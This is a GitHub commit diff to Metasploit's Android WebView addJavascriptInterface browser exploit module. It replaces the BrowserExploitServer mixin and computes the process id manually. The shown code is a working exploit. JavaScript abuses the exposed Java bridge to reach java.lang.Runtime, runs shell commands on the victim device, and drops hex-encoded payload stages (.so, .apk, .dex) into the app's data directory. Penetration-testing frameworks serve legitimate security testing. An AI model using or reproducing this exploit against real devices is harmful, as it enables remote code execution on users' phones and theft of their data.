Skip to content

Commit 176cc84

Browse files
committed
Remove BES and calculate the pid manually.
1 parent 46f7e60 commit 176cc84

File tree

1 file changed

+9
-9
lines changed

1 file changed

+9
-9
lines changed

modules/exploits/android/browser/webview_addjavascriptinterface.rb

Lines changed: 9 additions & 9 deletions
Original file line numberDiff line numberDiff line change
@@ -7,7 +7,7 @@
77

88
class Metasploit3 < Msf::Exploit::Remote
99

10-
include Msf::Exploit::Remote::BrowserExploitServer
10+
include Msf::Exploit::Remote::HttpServer::HTML
1111
include Msf::Exploit::Remote::BrowserAutopwn
1212

1313
autopwn_info({
@@ -77,15 +77,11 @@ def on_request_uri(cli, req)
7777
print_status("Serving javascript")
7878
send_response(cli, js, 'Content-type' => 'text/javascript')
7979
else
80-
super
80+
print_status("Serving exploit HTML")
81+
send_response_html(cli, html)
8182
end
8283
end
8384

84-
def on_request_exploit(cli, req, browser)
85-
print_status("Serving exploit HTML")
86-
send_response_html(cli, html)
87-
end
88-
8985
def ndkstager(stagename)
9086
localfile = File.join(Msf::Config::InstallRoot, 'data', 'android', 'libs', 'armeabi', 'libndkstager.so')
9187
data = File.read(localfile, :mode => 'rb')
@@ -99,16 +95,20 @@ def js
9995
// ensure that the object contains a native interface
10096
try { obj.getClass().forName('java.lang.Runtime'); } catch(e) { return; }
10197
98+
// get the pid
99+
var pid = obj.getClass().forName('android.os.Process').getMethod('myPid', null).invoke(null, null);
100+
102101
// get the runtime so we can exec
103102
var m = obj.getClass().forName('java.lang.Runtime').getMethod('getRuntime', null);
104103
var runtime = m.invoke(null, null);
105104
var stageData = "#{Rex::Text.to_hex(payload.raw, '\\\\x')}";
106105
var libraryData = "#{Rex::Text.to_hex(ndkstager(stagename), '\\\\x')}";
107106
108107
// get the process name, which will give us our data path
109-
var p = runtime.exec(['/system/bin/sh', '-c', 'cat /proc/$PPID/cmdline']);
108+
// $PPID does not seem to work on android 4.0, so we concat pids manually
109+
var p = runtime.exec(['/system/bin/sh', '-c', 'cat /proc/'+pid.toString()+'/cmdline']);
110110
var ch, path = '/data/data/';
111-
while ((ch = p.getInputStream().read()) != 0) { path += String.fromCharCode(ch); }
111+
while ((ch = p.getInputStream().read()) >= 0) { path += String.fromCharCode(ch); }
112112
var libraryPath = path + '/lib#{Rex::Text.rand_text_alpha(8)}.so';
113113
var stagePath = path + '/#{stagename}.apk';
114114
var dexPath = path + '/#{stagename}.dex';

0 commit comments

Comments
 (0)